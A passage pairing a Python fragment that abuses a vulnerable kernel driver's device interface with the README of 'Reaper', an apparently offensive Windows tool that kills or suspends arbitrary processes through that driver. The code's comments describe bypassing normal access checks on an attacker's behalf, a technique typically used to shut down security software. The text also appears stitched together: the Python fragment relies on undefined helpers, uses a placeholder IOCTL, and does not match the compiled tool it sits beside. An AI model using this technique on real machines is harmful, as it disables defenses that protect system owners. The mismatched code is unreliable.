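FILE_DEVICE_UNKNOWN, METHOD_NEITHER, FILE_ANY_ACCESS = 0x22, 0x3, 0x0

# Placeholder function number: kprocesshacker.sys defines its own IOCTL
# codes, and 0x801 here is illustrative, not the driver's real value.
IOCTL_KPH_TERMINATE_PROCESS = ctl_code(
    FILE_DEVICE_UNKNOWN, 0x801, METHOD_NEITHER, FILE_ANY_ACCESS)


def kill_process_via_driver(pid: int) -> None:
    # Windows-only: open the vulnerable driver's device object and ask it
    # to terminate an arbitrary PID on the attacker's behalf, bypassing
    # the usual OpenProcess access checks.
    if sys.platform != "win32":
        raise OSError("requires Windows with the vulnerable driver loaded")
    GENERIC_RW, OPEN_EXISTING = 0xC0000000, 3
    k32 = ctypes.windll.kernel32
    # Device name is an assumption based on the driver's 2.x version.
    handle = k32.CreateFileW(r"\\.\KProcessHacker2", GENERIC_RW, 0,
                             None, OPEN_EXISTING, 0, None)
    if handle == -1:
        raise OSError("driver device not found")
    inbuf = ctypes.c_ulong(pid)
    returned = ctypes.c_ulong(0)
    ok = k32.DeviceIoControl(handle, IOCTL_KPH_TERMINATE_PROCESS,
                             ctypes.byref(inbuf), ctypes.sizeof(inbuf),
                             None, 0, ctypes.byref(returned), None)
    k32.CloseHandle(handle)
    if not ok:
        raise OSError("DeviceIoControl failed")
```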


Features

  • Kill process
  • Suspend process

Help

    ____
   / __ \___  ____ _____  ___  _____
  / /_/ / _ \/ __ `/ __ \/ _ \/ ___/
 / _, _/  __/ /_/ / /_/ /  __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
                /_/

[Coded by MrEmpy]
[v1.0]

Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]

Options:
  sp    suspend process
  kp    kill process

Values:
  PROCESSID    process id to suspend/kill

Examples:
  Reaper.exe sp 1337
  Reaper.exe kp 1337

Demonstration

Install

You can compile Reaper directly from the source code or download a precompiled build. Visual Studio 2022 is required to compile it.

Note: The executable and driver must be in the same directory.


